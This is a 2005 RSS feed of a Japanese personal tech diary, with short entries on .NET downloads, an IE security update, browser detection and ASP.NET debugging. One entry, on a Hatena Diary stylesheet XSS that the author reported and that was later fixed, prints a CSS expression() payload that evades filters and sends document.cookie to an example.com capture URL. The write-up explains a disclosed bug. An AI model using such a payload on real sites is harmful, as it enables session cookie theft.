<?xml version="1.0" encoding="EUC-JP"?>
<?xml-stylesheet href="rss2html.xsl" type="text/xsl" ?>
<!--
Source: http://www.misuzilla.org/~mayuki/diary/diarysrv/rss.rdf
Expect: EUC-JP
-->
<rdf:RDF
  xml:lang="ja-JP"
  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xmlns:content="http://purl.org/rss/1.0/modules/content/"
  xmlns:xhtml="http://www.w3.org/1999/xhtml"
  xmlns="http://purl.org/rss/1.0/"
>
<channel rdf:about="http://www.misuzilla.org/~mayuki/diary/diarysrv/rss.rdf">
 <title>ぷろじぇくと、みすじら。</title>
 <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/</link>
 <description></description>
 <dc:creator>沢渡 真雪</dc:creator>
 <sy:updatePeriod>hourly</sy:updatePeriod>
 <items>
  <rdf:Seq>
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-1" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-2" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-3" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051223-1" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-1" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-2" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051211-1" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-1" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-2" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-3" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-4" />
   <rdf:li rdf:resource="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-5" />
  </rdf:Seq>
 </items>

</channel>

  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-1">
    <title>age++;</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-1</link>
    <dc:date>2005-12-27</dc:date>
    <description>一応、毎年のことなので書いておかないと。     </description>
    <content:encoded><![CDATA[<div>
<p>一応、毎年のことなので書いておかないと。</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-2">
    <title>JVN#93004125 BBSNote におけるクロスサイトスクリプティングの脆弱性</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-2</link>
    <dc:date>2005-12-27</dc:date>
    <description>ふむ。     </description>
    <content:encoded><![CDATA[<div>
<p>ふむ。</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-3">
    <title>はてなダイアリー日記 - スタイルシートにおけるXSS脆弱性の修正について</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051227-3</link>
    <dc:date>2005-12-27</dc:date>
    <description>hoshikuzuさんのとこから。ところからっていうか、問題を報告したのは私なのですが、直ったことは告げられていなかったので今日まで直ったことを知りませんでした(はてダ日記見てないし……)。 この問題を見つけたとき、いくつか試したのですが width: 1ｐｘ というのは効くけど width: １px というのは効きませんでした。何でも有効と言うわけでもなくて単位とか expression とかそういう一部のものだけという感じ。 もう直ってるので試したコードも書いておきます。 .calendar {   top: expressｉon(new Image().src='&amp;#104;ttp://www.example.com/capture?'+document['c'+'ookie']); }   cookieという文字列を削除するという処理がかかっているとは。まぁ、別にわざわざ取るコードにせずともスクリプトが動くことを示せればよかったのですが。 まぁなんにしても、危険なものを取り除いてして安全なものだけ利用できるようにするというのは難しいことだなーと改めて思ったのでした。</description>
    <content:encoded><![CDATA[<div>
<p><a title="hoshikuzu | star_dust の書斎#P2005219EXPRESSIONXSS" href="http://d.hatena.ne.jp/hoshikuzu/20051219#P2005219EXPRESSIONXSS">hoshikuzuさんのとこ</a>から。ところからっていうか、問題を報告したのは私なのですが、直ったことは告げられていなかったので今日まで直ったことを知りませんでした(<span title="はてなダイアリー" class="abbr"><abbr title="はてなダイアリー">はてダ</abbr></span>日記見てないし……)。</p>
<p>この問題を見つけたとき、いくつか試したのですが <code>width: 1ｐｘ</code> というのは効くけど <code>width: １px</code> というのは効きませんでした。何でも有効と言うわけでもなくて単位とか <code>expression</code> とかそういう一部のものだけという感じ。</p>
<p>もう直ってるので試したコードも書いておきます。</p>
<blockquote><pre><code>.calendar {
  top: expressｉon(new Image().src='&#104;ttp://www.example.com/capture?'+document['c'+'ookie']);
}
</code></pre>
</blockquote>
<p>cookieという文字列を削除するという処理がかかっているとは。まぁ、別にわざわざ取るコードにせずともスクリプトが動くことを示せればよかったのですが。</p>
<p>まぁなんにしても、危険なものを取り除いてして安全なものだけ利用できるようにするというのは難しいことだなーと改めて思ったのでした。</p>
</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051223-1">
    <title>視力 2.0</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512c.html#20051223-1</link>
    <dc:date>2005-12-23</dc:date>
    <description>これからの時代は視力 2.0! ランドルト環(Cみたいなやつ)を使っているうちは視力 1.0らしいです。 たまたま「視力 2.0」というのを見て「あー、また2.0かー」とか素で思ってしまったのです。そーゆー時代なのですね。ちがうちがう。</description>
    <content:encoded><![CDATA[<div>
<p>これからの時代は視力 2.0!</p>
<p>ランドルト環(Cみたいなやつ)を使っているうちは視力 1.0らしいです。</p>
<p>たまたま「視力 2.0」というのを見て「あー、また2.0かー」とか素で思ってしまったのです。そーゆー時代なのですね。ちがうちがう。</p>
</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-1">
    <title>Microsoft .NET Framework 2.0 日本語</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-1</link>
    <dc:date>2005-12-15</dc:date>
    <description>ダウンロードセンターに言語パッケージとSDKが登場。 SDKのインストールには先に再配布パッケージと言語パッケージのインストールが必要です。しばらく(数日中という意味ではない)すると日本語再配布パッケージが出るかも?  x86再配布パッケージ, Language Package, SDK x64再配布パッケージ, Language Package, SDK IA64再配布パッケージ, Language Package, SDK      </description>
    <content:encoded><![CDATA[<div>
<p>ダウンロードセンターに言語パッケージとSDKが登場。</p>
<p>SDKのインストールには先に再配布パッケージと言語パッケージのインストールが必要です。しばらく(数日中という意味ではない)すると日本語再配布パッケージが出るかも?</p>
<dl>
<dt>x86</dt><dd><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5&amp;DisplayLang=en">再配布パッケージ</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=39c8b63b-f64b-4b68-a774-b64ed0c32ae7&amp;DisplayLang=ja">Language Package</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=fe6f2099-b7b4-4f47-a244-c96d69c35dec&amp;DisplayLang=ja">SDK</a></dd>
<dt>x64</dt><dd><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=b44a0000-acf8-4fa1-affb-40e78d788b00&amp;DisplayLang=en">再配布パッケージ</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=92e0e1ce-8693-4480-84fa-7d85eef59016&amp;DisplayLang=ja">Language Package</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=1aef6fce-6e06-4b66-afe4-9aad3c835d3d&amp;DisplayLang=ja">SDK</a></dd>
<dt>IA64</dt><dd><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=53c2548b-bec7-4ab4-8cbe-33e07cfc83a7&amp;DisplayLang=en">再配布パッケージ</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=83bb3bf2-599b-46fb-8816-7ded9605d8b2&amp;DisplayLang=ja">Language Package</a>, <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=f4dd601b-1b88-47a3-bdc1-79afa79f6fb0&amp;DisplayLang=ja">SDK</a></dd>
</dl>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-2">
    <title>Internet Explorer 用の累積的なセキュリティ更新プログラム (905915) (MS05-054)</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051215-2</link>
    <dc:date>2005-12-15</dc:date>
    <description>このアップデートなのですがWindows XP Professional x64 Editionについては次のようにあります。  注: x86 以外のオペレーティング システムのバージョンについての深刻度は、次の x86 オペレーティング システムのバージョンと同じです。    Windows XP Professional x64 Edition 上の Internet Explorer 6 の深刻度は、Internet Explorer 6 Service Pack 1 (Windows Server 2003 以前のすべてのサポートされているオペレーティング システムのバージョン) の深刻度と同じです。   Microsoft Windows Server 2003 for Itanium-based Systems および Windows Server 2003 x64 Edition 上の Internet Explorer 6 の深刻度は、Windows Server 2003 上の Internet Explorer 6 と同じです。  でもWindows Server 2003ベースなXP x64はWSvr 2k3と同じはずなのでは?とダウンロードを見たら…  	Windows XP x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915) 	Windows Server 2003 x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915)  WindowsServer2003.WindowsXP-KB905915-x64-JPN.exeで同じファイルでした。もちろん同じファイルだからといって元々の影響も同じかどうかといえば別ですが。</description>
    <content:encoded><![CDATA[<div>
<p>このアップデートなのですがWindows XP Professional x64 Editionについては次のようにあります。</p>
<blockquote>
<p>注: x86 以外のオペレーティング システムのバージョンについての深刻度は、次の x86 オペレーティング システムのバージョンと同じです。</p>
<ul>
  <li>Windows XP Professional x64 Edition 上の Internet Explorer 6 の深刻度は、Internet Explorer 6 Service Pack 1 (Windows Server 2003 以前のすべてのサポートされているオペレーティング システムのバージョン) の深刻度と同じです。</li>
  <li>Microsoft Windows Server 2003 for Itanium-based Systems および Windows Server 2003 x64 Edition 上の Internet Explorer 6 の深刻度は、Windows Server 2003 上の Internet Explorer 6 と同じです。</li>
</ul></blockquote>
<p>でもWindows Server 2003ベースなXP x64はWSvr 2k3と同じはずなのでは?とダウンロードを見たら…</p>
<ul>
	<li><a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=E1652B4A-6339-4B31-8ACF-D2A844C24F70&amp;displaylang=ja">Windows XP x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915)</a></li>
	<li><a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=8E9C23E5-7988-42DA-A8BD-2C1A534BF995&amp;displaylang=ja">Windows Server 2003 x64 Edition 用 Internet Explorer のセキュリティ更新プログラム (KB905915)</a></li>
</ul>
<p><q>WindowsServer2003.WindowsXP-KB905915-x64-JPN.exe</q>で同じファイルでした。もちろん同じファイルだからといって元々の影響も同じかどうかといえば別ですが。</p>
</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051211-1">
    <title>ToHeart2.exe</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200512b.html#20051211-1</link>
    <dc:date>2005-12-11</dc:date>
    <description>ふと、ライブラリを配布するときに「このライブラリを動的・静的リンクを問わず利用した場合、ソフトウェアのソースコードを公開してはならない」というライセンスにしておいて、何も考えない開発者がうっかりGPLと混ぜて、さあ大変!というネタを思いついた。</description>
    <content:encoded><![CDATA[<div>
<p>ふと、ライブラリを配布するときに「このライブラリを動的・静的リンクを問わず利用した場合、ソフトウェアのソースコードを公開<strong>してはならない</strong>」というライセンスにしておいて、何も考えない開発者がうっかりGPLと混ぜて、さあ大変!というネタを思いついた。</p>
</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-1">
    <title>Gecko 系ブラウザの判別、 Safari やその派生ブラウザの判別</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-1</link>
    <dc:date>2005-11-28</dc:date>
    <description>これら AppleWebKit 系ブラウザたちをひとまとめに判別する際、ぼくは &amp;quot;AppleWebKit&amp;quot; の文字列を見てます。ブラウザ判別の主用途は、レンダリングエンジンもしくは JavaScript エンジンの差異に前もって気付くためであり、その差異を生んでいるもの・包括するものは、やっぱり &amp;quot;AppleWebKit&amp;quot; だと思うので。 ふむむ、Safari系というかAppleWebKit系のブラウザもあったのですね。すっかり失念していました。 AppleWebKitを使った場合、Safariが無理やり埋め込まれるならいいけれど、そうではない場合にちょっと困ったことが起こるかもしれないですね。Safari の偽装を解く事は不可能ということは、強制的に埋め込まれるってことなのかな。     </description>
    <content:encoded><![CDATA[<div>
<blockquote cite="http://www.remus.dti.ne.jp/~a-satomi/nikki/2005/11b.html#d28n02" title="Gecko 系ブラウザの判別、 Safari やその派生ブラウザの判別 - ねこめしにっき(2005年11月後半)"><p>これら AppleWebKit 系ブラウザたちをひとまとめに判別する際、ぼくは &quot;AppleWebKit&quot; の文字列を見てます。ブラウザ判別の主用途は、レンダリングエンジンもしくは JavaScript エンジンの差異に前もって気付くためであり、その差異を生んでいるもの・包括するものは、やっぱり &quot;AppleWebKit&quot; だと思うので。</p></blockquote>
<p>ふむむ、Safari系というかAppleWebKit系のブラウザもあったのですね。すっかり失念していました。</p>
<p>AppleWebKitを使った場合、<code>Safari</code>が無理やり埋め込まれるならいいけれど、そうではない場合にちょっと困ったことが起こるかもしれないですね。<q>Safari の偽装を解く事は不可能</q>ということは、強制的に埋め込まれるってことなのかな。</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-2">
    <title>だっしゅ</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-2</link>
    <dc:date>2005-11-28</dc:date>
    <description>ふと思って前屈ぐいっとやってみたら、さすがにマイナス40はないけれど、マイナス14ぐらい? 本当はまだまだできるです。あのフレーズを聴くたび6号さんが前屈している図が思い浮かびます。 黄色いバカンス使いすぎ! くるみ Verが好きです!     </description>
    <content:encoded><![CDATA[<div>
<p>ふと思って前屈ぐいっとやってみたら、さすがにマイナス40はないけれど、マイナス14ぐらい? 本当はまだまだできるです。あのフレーズを聴くたび6号さんが前屈している図が思い浮かびます。</p>
<p>黄色いバカンス使いすぎ! くるみ Verが好きです!</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-3">
    <title>やっぱり</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-3</link>
    <dc:date>2005-11-28</dc:date>
    <description>頭の絵はそのままで。めんどくさいのです。 あと、フォントを指定したからなのかまこすてんのGecko系(Camino, Firefox)でガタガタになっていたのが直ってた。     </description>
    <content:encoded><![CDATA[<div>
<p>頭の絵はそのままで。めんどくさいのです。</p>
<p>あと、フォントを指定したからなのか<span title="Mac OS X" class="abbr"><abbr title="Mac OS X">まこすてん</abbr></span>のGecko系(Camino, Firefox)でガタガタになっていたのが直ってた。</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-4">
    <title>CDF</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-4</link>
    <dc:date>2005-11-28</dc:date>
    <description>だいぶ前からですがRSSと合わせて、(いい加減ながらも)CDFを生成しています。CDF使う!って人はどうぞ(/channel.cdf)。マジオススメ(ぼうよみ)     </description>
    <content:encoded><![CDATA[<div>
<p>だいぶ前からですがRSSと合わせて、(いい加減ながらも)CDFを生成しています。CDF使う!って人はどうぞ(<a href="http://www.misuzilla.org/~mayuki/diary/diarysrv/channel.cdf">/channel.cdf</a>)。マジオススメ(ぼうよみ)</p>


</div>]]></content:encoded>
  </item>
  <item rdf:about="http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-5">
    <title>XP(x86)上で制限ユーザ(Users)としてログオンしてASP.NETをデバッグする。</title>
    <link>http://www.fastwave.gr.jp/diarysrv/misuzilla/200511c.html#20051128-5</link>
    <dc:date>2005-11-28</dc:date>
    <description>普段はUsersとしてログオンしているのですが、この場合案外面倒ということがわかりました。結論から言うとローカルのAdministratorsに所属させてしまうかW2k3を仮想マシンに入れるかするのがよさそう。 まずローカルグループのVS DevelopersとDebugger Usersに入れればいいやー、とか思ったのですがそれではダメなのでした。 それだけだとプロジェクトを実行しようとしているときにエラーが発生しました : Web サーバーでデバッグを開始できません。アクセスが拒否されました。と怒られてしまうのです。これは、    aspnet_wp.exe は ASPNET ユーザで実行している   アタッチを試みたユーザは ASPNET ユーザではない   アタッチを試みたユーザは Administrators に所属していない(Administrators はログオンしてるユーザを関係なくアタッチできる)  ということなのですが、まあ当たり前ですね。で、じゃあ aspnet_wp.exe の実行ユーザを変更しよーとか思うと Machine.config で processModel 要素あたりをいじることになるのです。 Machine.config で起動するユーザを指定するにはファイルに資格情報(いわゆるパスワード)を生で書くか、資格情報を保護した状態にして指定するかなのですが、パスワード生はいヤすぎですし、保護するのも面倒です(コマンド一回とはいえ超面倒くさがりなので)。というか、そもそも Machine.config とかいじりたくないのですよ! ちなみに各種資格情報(SQL Server接続文字列とかも含む)を暗号化して保護する方法はMSKBの ASP.NET ユーティリティを使用して資格情報およびセッション状態の接続文字列を暗号化する方法(329290) を参照のこと。 これがW2k3(もしくはWindows XP x64 Edition)のIIS 6なら、aspnet_wp.exe に相当する w3wp.exe をIISマネージャから簡単に適当なアカウントで実行できます。</description>
    <content:encoded><![CDATA[<div>
<p>普段はUsersとしてログオンしているのですが、この場合案外面倒ということがわかりました。結論から言うとローカルのAdministratorsに所属させてしまうかW2k3を仮想マシンに入れるかするのがよさそう。</p>
<p>まずローカルグループのVS DevelopersとDebugger Usersに入れればいいやー、とか思ったのですがそれではダメなのでした。</p>
<p>それだけだと<q>プロジェクトを実行しようとしているときにエラーが発生しました : Web サーバーでデバッグを開始できません。アクセスが拒否されました。</q>と怒られてしまうのです。これは、</p>
<ul>
  <li>aspnet_wp.exe は ASPNET ユーザで実行している</li>
  <li>アタッチを試みたユーザは ASPNET ユーザではない</li>
  <li>アタッチを試みたユーザは Administrators に所属していない(Administrators はログオンしてるユーザを関係なくアタッチできる)</li>
</ul>
<p>ということなのですが、まあ当たり前ですね。で、じゃあ aspnet_wp.exe の実行ユーザを変更しよーとか思うと Machine.config で <code>processModel</code> 要素あたりをいじることになるのです。</p>
<p>Machine.config で起動するユーザを指定するにはファイルに資格情報(いわゆるパスワード)を生で書くか、資格情報を保護した状態にして指定するかなのですが、パスワード生はいヤすぎですし、保護するのも面倒です(コマンド一回とはいえ超面倒くさがりなので)。というか、そもそも Machine.config とかいじりたくないのですよ!</p>
<p>ちなみに各種資格情報(SQL Server接続文字列とかも含む)を暗号化して保護する方法は<span title="Microsoft Knowledge Base" class="abbr"><abbr title="Microsoft Knowledge Base">MSKB</abbr></span>の <a href="http://support.microsoft.com/default.aspx?scid=kb;ja;329290">ASP.NET ユーティリティを使用して資格情報およびセッション状態の接続文字列を暗号化する方法</a>(329290) を参照のこと。</p>
<p>これが<span title="Windows Server 2003" class="abbr"><abbr title="Windows Server 2003">W2k3</abbr></span>(もしくはWindows XP x64 Edition)のIIS 6なら、aspnet_wp.exe に相当する w3wp.exe をIISマネージャから簡単に適当なアカウントで実行できます。</p>
</div>]]></content:encoded>
  </item>


</rdf:RDF>
